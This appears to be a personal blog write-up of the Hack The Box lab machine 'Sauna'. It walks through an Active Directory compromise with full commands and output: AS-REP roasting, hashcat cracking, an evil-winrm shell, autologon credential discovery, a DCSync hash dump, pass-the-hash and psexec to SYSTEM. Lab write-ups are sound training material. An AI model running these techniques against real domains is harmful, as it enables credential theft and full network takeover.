Blog
Search…
Sauna HTB writeup
Sauna was my very first windows box, so don't expect this writeup to be super technical or with a lot of knowledge of what's going. Even though, the box was easy to do.

Recon

First nmap scan showed the box was an AD with kerberos and a web site running on port 80.
1
# Port scan
2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-27 18:03 CEST
3
Nmap scan report for 10.10.10.175
4
Host is up (0.068s latency).
5
Not shown: 65515 filtered ports
6
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
7
PORT STATE SERVICE
8
53/tcp open domain
9
80/tcp open http
10
88/tcp open kerberos-sec
11
135/tcp open msrpc
12
139/tcp open netbios-ssn
13
389/tcp open ldap
14
445/tcp open microsoft-ds
15
464/tcp open kpasswd5
16
593/tcp open http-rpc-epmap
17
636/tcp open ldapssl
18
3268/tcp open globalcatLDAP
19
3269/tcp open globalcatLDAPssl
20
5985/tcp open wsman
21
9389/tcp open adws
22
49667/tcp open unknown
23
49673/tcp open unknown
24
49674/tcp open unknown
25
49675/tcp open unknown
26
49686/tcp open unknown
27
64808/tcp open unknown
28
29
Read data files from: /usr/bin/../share/nmap
30
Nmap done: 1 IP address (1 host up) scanned in 184.21 seconds
31
Raw packets sent: 196698 (8.655MB) | Rcvd: 2100 (479.390KB)
32
33
34
35
# Script results
36
[*] Running NMAP scripts to open ports
37
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-27 18:06 CEST
38
Nmap scan report for 10.10.10.175
39
Host is up (0.32s latency).
40
41
PORT STATE SERVICE VERSION
42
53/tcp open domain?
43
| fingerprint-strings:
44
| DNSVersionBindReqTCP:
45
| version
46
|_ bind
47
80/tcp open http Microsoft IIS httpd 10.0
48
| http-methods:
49
|_ Potentially risky methods: TRACE
50
|_http-server-header: Microsoft-IIS/10.0
51
|_http-title: Egotistical Bank :: Home
52
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-28 00:07:15Z)
53
135/tcp open msrpc Microsoft Windows RPC
54
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
55
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
56
445/tcp open microsoft-ds?
57
464/tcp open kpasswd5?
58
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
59
636/tcp open tcpwrapped
60
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
61
3269/tcp open tcpwrapped
62
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
63
|_http-server-header: Microsoft-HTTPAPI/2.0
64
|_http-title: Not Found
65
9389/tcp open mc-nmf .NET Message Framing
66
49667/tcp open msrpc Microsoft Windows RPC
67
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
68
49674/tcp open msrpc Microsoft Windows RPC
69
49675/tcp open msrpc Microsoft Windows RPC
70
49686/tcp open msrpc Microsoft Windows RPC
71
64808/tcp open msrpc Microsoft Windows RPC
72
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
73
SF-Port53-TCP:V=7.80%I=7%D=6/27%Time=5EF76E89%P=x86_64-pc-linux-gnu%r(DNSV
74
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
75
SF:x04bind\0\0\x10\0\x03");
76
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
77
78
Host script results:
79
|_clock-skew: 8h00m45s
80
| smb2-security-mode:
81
| 2.02:
82
|_ Message signing enabled and required
83
| smb2-time:
84
| date: 2020-06-28T00:09:39
85
|_ start_date: N/A
Copied!

FSmith user

Browsing the web site I've found a list of possible usernames at http://10.10.10.175/about.html
Then did a wordlist of possible usernames.
1
$ cat usernames.txt
2
sauna
3
HSmith
4
SKerb
5
HBear
6
BTaylor
7
SDriver
8
SCoins
9
FSmith
Copied!
Next step is to try get TGTs from users who have 'Do not require Kerberos preauthentication' set on kerberos
1
$ python3 /home/xnaaro/git_repos/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile usernames.txt -format hashcat -o passwords.txt
2
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
3
4
[-] User sauna doesn't have UF_DONT_REQUIRE_PREAUTH set
5
[-] User HSmith doesn't have UF_DONT_REQUIRE_PREAUTH set
6
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
7
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
8
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
9
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
10
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Copied!
This gave me an Kerberos 5 AS-REP hash from FSmith user.
1
$ cat passwords.txt
2
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:3206b8cb1b99b24d5ddeb489e7159ccf$43b733ba230f2f9a2de8663588d5d335a8928ec26a0d6c061aadb80821b4e322317d7687b0f90bbb8c9c080c0ed9daca9df11bacc6e7db2eb4df5f742194c19a65792edeb948e899fab681fff296d296ab65366cc0cb93c4ab84f058c1--------------------------------------------------------------------------
Copied!
Cracked the password with hashcat
1
$ hashcat -m 18200 passwords.txt --wordlist /usr/share/wordlists/rockyou.txt --force -o cracked_pass
2
hashcat (v5.1.0) starting...
3
4
5
Session..........: hashcat
6
Status...........: Cracked
7
Hash.Type........: Kerberos 5 AS-REP etype 23
8
Hash.Target......: $krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:bd3af59...b5f83a
9
Time.Started.....: Mon Jun 29 18:12:54 2020 (32 secs)
10
Time.Estimated...: Mon Jun 29 18:13:26 2020 (0 secs)
11
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
12
Guess.Queue......: 1/1 (100.00%)
13
Speed.#1.........: 331.2 kH/s (12.07ms) @ Accel:8 Loops:1 Thr:64 Vec:1
14
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
15
Progress.........: 10543104/14344385 (73.50%)
16
Rejected.........: 0/10543104 (0.00%)
17
Restore.Point....: 10530816/14344385 (73.41%)
18
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
19
Candidates.#1....: Tr1nity -> Teague51
20
21
Started: Mon Jun 29 18:12:54 2020
22
Stopped: Mon Jun 29 18:13:27 2020
23
24
25
$ cat cracked_pass
26
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:bd3af5934e1a9abfc6cd770402233512$6edde74195ce2e808f1fa664e97ebab69a672a6b12ab0a580906d2c357cc98f986fa71aba2fe85c9ce139b297d234824f82b374f473585a////////////////////////////////:The----------3
Copied!
As winrm was enabled on the server I could easily connect using evil-winrm using FSmith and just cracked credentials.
1
$ evil-winrm -i 10.10.10.175 -u FSmith -p The-----------3
2
3
Evil-WinRM shell v2.3
4
5
Info: Establishing connection to remote endpoint
6
7
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
8
egotisticalbank\fsmith
9
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
10
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
11
12
13
Directory: C:\Users\FSmith\Desktop
14
15
16
Mode LastWriteTime Length Name
17
---- ------------- ------ ----
18
-a---- 1/23/2020 10:03 AM 34 user.txt
19
20
21
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
22
1b5520b98d---------------------
Copied!
First thing I did was to run winPEAS.exe which gave me default credentials for svc_loanmgr user
1
[+] Looking for AutoLogon credentials(T1012)
2
Some AutoLogon credentials were found!!
3
DefaultDomainName : EGOTISTICALBANK
4
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
5
DefaultPassword : Mo-----------------d!
Copied!
With this user now I can dump secrets with impacket.
1
$ impacket-secretsdump EGOTISTICAL-BANK.LOCAL/[email protected]
2
3
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
4
5
Password:
6
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
7
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
8
[*] Using the DRSUAPI method to get NTDS.DIT secrets
9
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863-----------------------dff:::
10
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
11
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
12
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
13
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
14
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
15
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:bc8d511e5aba1a9a0dc08dd65886267b:::
16
[*] Kerberos keys grabbed
17
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
18
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
19
Administrator:des-cbc-md5:19d5f15d689b1ce5
20
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
21
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
22
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
23
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
24
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
25
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
26
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
27
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
28
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
29
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
30
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
31
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
32
SAUNA$:aes256-cts-hmac-sha1-96:85aa062ea68e989d52ea603faf0819ef94ab9749ac16385560f7d85a23a1b99a
33
SAUNA$:aes128-cts-hmac-sha1-96:7c6cc42b0a42c1c1d3e71d4524a265f2
34
SAUNA$:des-cbc-md5:f438fd4f61136be5
35
[*] Cleaning up...
Copied!
I've first had some errors about time not synced with the server, so first updated my local type with the box date.
1
$ sudo ntpdate 10.10.10.175
2
30 Jun 04:51:08 ntpdate[19204]: step time server 10.10.10.175 offset +25203.209026 sec
Copied!
Now got a ticket from kerberos as Adminstrator user using his NTLM hash
1
$ python3 getTGT.py EGOTISTICAL-BANK.LOCAL/Administrator -hashes :d9485863-------------------ff
2
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
3
4
[*] Saving ticket in Administrator.ccache
Copied!
Set an environment variable with ticket file.
1
export KRB5CCNAME=/home/xnaaro/git_repos/impacket/examples/Administrator.ccache
Copied!
Now added sauna to etc/hosts and exec into the box
1
$ python3 psexec.py EGOTISTICAL-BANK.LOCAL/[email protected] -k -no-pass
2
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
3
4
[*] Requesting shares on sauna.EGOTISTICAL-BANK.LOCAL.....
5
[*] Found writable share ADMIN$
6
[*] Uploading file IIMFVtLs.exe
7
[*] Opening SVCManager on sauna.EGOTISTICAL-BANK.LOCAL.....
8
[*] Creating service QMyO on sauna.EGOTISTICAL-BANK.LOCAL.....
9
[*] Starting service QMyO.....
10
[!] Press help for extra shell commands
11
Microsoft Windows [Version 10.0.17763.973]
12
(c) 2018 Microsoft Corporation. All rights reserved.
Copied!
I have system rooted at this point.
1
C:\Users\Administrator\Desktop>whoami
2
nt authority\system
3
4
C:\Users\Administrator\Desktop>hostname
5
SAUNA
6
C:\Users\Administrator\Desktop>type root.txt
7
f3ee04965c68257382e31502cc5e881f
Copied!
This was my first windows box, I was a bit lost and not fully understand yet all the steps I did, need to learn more about how kerberos works.
Regards
Last modified 1yr ago
Copy link